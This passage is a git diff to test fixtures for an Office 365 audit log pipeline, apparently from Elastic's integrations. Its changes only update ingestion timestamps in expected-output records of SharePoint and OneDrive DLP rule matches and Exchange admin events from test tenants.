@@ -198,7 +198,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.971758400Z", + "ingested": "2021-12-14T14:49:27.201926400Z", "original": "{\"CreationTime\":\"2020-02-25T16:23:39\",\"Id\":\"eb8259c8-d2c2-449d-bd35-5c8a033eb629\",\"IncidentId\":\"eeeb7b44-fc69-c19f-b000-08d7ba115afd\",\"ObjectId\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:SiteAdmin\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":12,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"7503b92a-67c2-494b-8a46-57ef0d738886\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected U.S. 
Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data Copy.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data%20Copy.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T16:21:50\",\"ItemLastModifiedTime\":\"2020-02-25T16:21:44\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", 
@@ -308,7 +308,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:42:29.971764Z", + "ingested": "2021-12-14T14:49:27.201926880Z", "original": "{\"CreationTime\":\"2020-02-25T16:23:39\",\"Id\":\"50a90c83-7e15-4679-8778-d9dd30927e66\",\"IncidentId\":\"eeeb7b44-fc69-c19f-b000-08d7ba115afd\",\"ObjectId\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[],\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":12,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"c5981414-9f1f-4275-a2df-2fbfb1d03795\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected U.S. Financial\",\"Severity\":\"Low\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data Copy.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data%20Copy.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T16:21:50\",\"ItemLastModifiedTime\":\"2020-02-25T16:21:44\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", 
@@ -422,7 +422,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.971777700Z", + "ingested": "2021-12-14T14:49:27.201927317Z", "original": "{\"CreationTime\":\"2020-02-25T16:22:22\",\"Id\":\"59652f9a-087c-4b65-b88c-b293ade34202\",\"IncidentId\":\"3066c3c5-eb56-dd03-b000-08d7ba115afd\",\"ObjectId\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:SiteAdmin\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":12,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"7503b92a-67c2-494b-8a46-57ef0d738886\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected U.S. 
Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T15:22:49\",\"ItemLastModifiedTime\":\"2020-02-25T16:21:44\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", 
@@ -536,7 +536,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.971782400Z", + "ingested": "2021-12-14T14:49:27.201927733Z", "original": "{\"CreationTime\":\"2020-02-26T10:13:48\",\"Id\":\"d69c6758-f210-43bd-bac1-563adef4b4cf\",\"IncidentId\":\"f7295114-e601-f2b6-8800-08d7baa56f8b\",\"ObjectId\":\"f026407b-090a-4c15-99b5-09851842d96d\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"08745d02-5d45-48bd-98e1-8199ab1efdbe\",\"PolicyName\":\"Financial Data Detection\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:SiteAdmin\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":42,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":85,\"Count\":23,\"SensitiveType\":\"0e9b3178-9678-47dd-a509-37222ca96b42\"}]},\"RuleId\":\"bc4d376f-b038-4695-9362-609d32f963cf\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected France Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"INTERNAL CREDIT CARD NUMBERS.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/INTERNAL%20CREDIT%20CARD%20NUMBERS.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-26T09:44:40\",\"ItemLastModifiedTime\":\"2020-02-26T09:46:23\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"f026407b-090a-4c15-99b5-09851842d96d\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": 
"ComplianceDLPSharePoint", "provider": "OneDrive", @@ -650,7 +650,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.971787300Z", + "ingested": "2021-12-14T14:49:27.201928151Z", "original": "{\"CreationTime\":\"2020-02-26T12:39:40\",\"Id\":\"93585ace-96eb-4af1-fdb2-08d7bab8f2bd\",\"IncidentId\":\"0ae82be2-e321-ab52-d000-08d7bab8fe55\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"08745d02-5d45-48bd-98e1-8199ab1efdbe\",\"PolicyName\":\"Financial Data Detection\",\"Rules\":[{\"ActionParameters\":[\"GenerateAlert:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"NotifyUser\",\"GenerateAlert\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":42,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":85,\"Count\":2,\"SensitiveType\":\"0e9b3178-9678-47dd-a509-37222ca96b42\"}]},\"RuleId\":\"121c85c3-b2b2-4d5b-af11-b1d1bc0b36fd\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected France Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Document.docx\",\"FileOwner\":\"alice@testsiem2.onmicrosoft.com\",\"FilePathUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications/Shared%20Documents/Document.docx\",\"FileSize\":35920,\"From\":\"alice@testsiem2.onmicrosoft.com\",\"IsViewableByExternalUsers\":false,\"ItemCreationTime\":\"2020-02-26T09:55:38\",\"ItemLastModifiedTime\":\"2020-02-26T09:56:12\",\"SiteCollectionGuid\":\"4aaa3319-df17-4ea0-a142-42cf204cfc62\",\"SiteCollectionUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications\",\"UniqueID\":\"3ace820e-9358-4520-9df6-5bd65602cef0\"},\"UserId\":\"DLPAgent\",\"UserKey\":\"DLPAgent\",\"UserType\":4,\"Version\":1,\"Workload\":\"SharePoint\"}", "code": "ComplianceDLPSharePoint", "provider": "SharePoint", 
@@ -764,7 +764,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:29.971792700Z", + "ingested": "2021-12-14T14:49:27.201928572Z", "original": "{\"CreationTime\":\"2020-02-26T12:39:40\",\"Id\":\"93585ace-96eb-4af1-fdb2-08d7bab8f2bd\",\"IncidentId\":\"0ae82be2-e321-ab52-d000-08d7bab8fe55\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"08745d02-5d45-48bd-98e1-8199ab1efdbe\",\"PolicyName\":\"Financial Data Detection\",\"Rules\":[{\"ActionParameters\":[\"GenerateAlert:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"NotifyUser\",\"GenerateAlert\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":42,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":85,\"Count\":2,\"SensitiveType\":\"0e9b3178-9678-47dd-a509-37222ca96b42\"}]},\"RuleId\":\"121c85c3-b2b2-4d5b-af11-b1d1bc0b36fd\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected France Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Document.docx\",\"FileOwner\":\"alice@testsiem2.onmicrosoft.com\",\"FilePathUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications/Shared%20Documents/Document.docx\",\"FileSize\":35920,\"From\":\"alice@testsiem2.onmicrosoft.com\",\"IsViewableByExternalUsers\":false,\"ItemCreationTime\":\"2020-02-26T09:55:38\",\"ItemLastModifiedTime\":\"2020-02-26T09:56:12\",\"SiteCollectionGuid\":\"4aaa3319-df17-4ea0-a142-42cf204cfc62\",\"SiteCollectionUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications\",\"UniqueID\":\"3ace820e-9358-4520-9df6-5bd65602cef0\"},\"UserId\":\"DLPAgent\",\"UserKey\":\"DLPAgent\",\"UserType\":4,\"Version\":1,\"Workload\":\"SharePoint\"}", "code": "ComplianceDLPSharePoint", "provider": "SharePoint", 
diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json index fa9f120c507..23d58db7ad8 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json-expected.json @@ -49,7 +49,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852951400Z", + "ingested": "2021-12-14T14:49:28.056941390Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -130,7 +130,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852960600Z", + "ingested": "2021-12-14T14:49:28.056944409Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6c3454e1-1a13-411b-bed1-08d7adfc0c09\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -211,7 +211,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852966700Z", + "ingested": "2021-12-14T14:49:28.056945005Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"b5131b23-3efb-481a-c05b-08d7ac0f2a82\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -279,7 +279,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852972800Z", + "ingested": "2021-12-14T14:49:28.056945523Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"ef597809-1c52-4a85-7cce-08d7adfc0939\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\2c6709f0-beaf-4ffd-99ea-d02c796c25d3\",\"Operation\":\"Install-DefaultSharingPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -347,7 +347,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852977800Z", + "ingested": "2021-12-14T14:49:28.056945971Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"362ff802-6df6-47e5-09a2-08d7adfc095b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Install-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -416,7 +416,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852981100Z", + "ingested": "2021-12-14T14:49:28.056946513Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -486,7 +486,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852985900Z", + "ingested": "2021-12-14T14:49:28.056946962Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:43\",\"ExternalAccess\":true,\"Id\":\"168019d2-1e8a-4394-e90b-08d7ac0f1e69\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\"},{\"Name\":\"UMDataStorage\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -554,7 +554,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852991Z", + "ingested": "2021-12-14T14:49:28.056947401Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -635,7 +635,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.852996300Z", + "ingested": "2021-12-14T14:49:28.056947839Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 